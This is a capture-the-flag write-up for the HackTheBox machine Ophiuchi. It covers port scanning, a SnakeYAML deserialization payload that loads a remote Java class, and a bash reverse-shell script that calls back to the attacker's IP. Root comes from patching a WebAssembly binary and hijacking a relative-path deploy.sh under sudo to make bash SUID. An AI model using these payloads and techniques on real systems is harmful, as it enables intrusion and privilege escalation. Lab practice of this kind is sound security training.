# HackTheBox-Ophiuchi ## Rustscan ```bash rustscan -a 10.10.10.227 -- -A -sC -sV .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan Open 10.10.10.227:22 Open 10.10.10.227:8080 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.38 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Parse YAML ``` ## PORT 8080 (HTTP) There's a YAML parser so I tried to write something there but got no response From the nmap scan we already know that Apache Tomcat 9.0.38 is running ,so I logging in by going to `/manager` ,but wasn't able to login using the default credentials So after googling for apache tomcat 9.0.38 vulnerabilites/exploits I found snake yaml deserilization exploit The exploit is about Snake YAML having a feature to call a java class constructor ``` !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://VPN_IP/"] ]] ] ``` We'll see a request being made for `/METAINF/services/javax.script.ScriptEngineFactory` on our machine We can abuse it in a way that keeping the same file structure like having directory 'META-IN' then a sub directory `services` having a file name `javax.script.ScriptEngineFactory` and in that file we will call our exploit Create a file name `exploit.java` you can get the java code from here and in that we'll try to ping our local machine to see if the exploit works or not so that we can get a reverse shell https://github.com/artsploit/yaml-payload/blob/master/src/artsploit/AwesomeScriptEngineFactory.java Compile the java file using `javac` and you will get .class file In the `javax.script.ScriptEngineFactory` we will include this content And also we will make a folder `snakeyml` having that `exlpoit.class` file So the file structure will look like this , so start the python3 server or apache2 to host the folder and use the same java class constructor we were calling yaml After sending it we receive a 500 error We can see the error that we compiled the java file with the latest version of `javac` so we need to comiple it using the java class 55 version. We can do this by specifying the release as a paramter in javac. (Thank you stackoverflow) Now compiling it using the release version 11 and start both the python3 web server and start listening for ICMP packets on tun0 interface On giving java constructor class in yaml we will see the ICMP packets But there was a problem in getting a reverse shell no matter which reverse shell I tried to use whether it was a bash or netcat I couldn't get a shell so I made a script which had a bash reverse shell ```bash #!/bin/bash bash -i >& /dev/tcp/10.10.14.196/4242 0>&1 ``` Now we will download the bash script on the target machine using `wget` save it in `/tmp` directory and will execute it using bash also we will setup a netcat listener. So modifying our `exploit.java` file Enter this in yaml parser input box Once you enter this on your terminal you'll see the request being made to get `exploit.sh` and you will get a reverse shell Stabilizing the shell using `python3` Since apache tomcat is running we can now search for users file Now using find command to search for that file We can try to switch user as `admin` with that password on the machine Reading the source code we can see that it's going to read the Web assembly binary then it's going to get a value from `info` function and if that value it's not equal to 1 the program will give the ouput "Not ready to deploy" else it would execute a `deploy.sh` script. There is one thing to note that `main.wasm` and `deploy.sh` don't have the absolute path in the source meaning we can make our own files and then play around with the PATH variable. So first I am going to download `main.wasm` on to my machine https://github.com/WebAssembly/wabt And here will be using a tool named `WABT` Web Assembly Binary Toolkit , we need to convert the main.wasm file to .wat file as it is a text format to that binary. But before that first let's see the `info` function in the binary using wasm-decompile which will decompile the binary to C syntax We can see that `info` function returns the value 0 so that's what we need to change. Converting .wasm to .wat file On opening the .wat file we can see that `const` value is 0 So remeber the source code had a condition if `f!=1` (if f is not equal to 1) it's going to print not deploy else it will execute the `deploy.sh` script so change that 0 to 1 Now we need that back in binary form (.wasm) so we are going to convert it from .wat to .wasm Transfer this onto target machine in `/tmp` directory also to make a `deploy.sh` file. I added a command to make bash a SUID in that script file Now to add `/tmp` to PATH variable and run the golang source code as sudo We can see that `/bin/bash` now has a SUID bit on this means we can get root by running bash with `-p` You can also get a reverse shell using netcat (OpenBSD)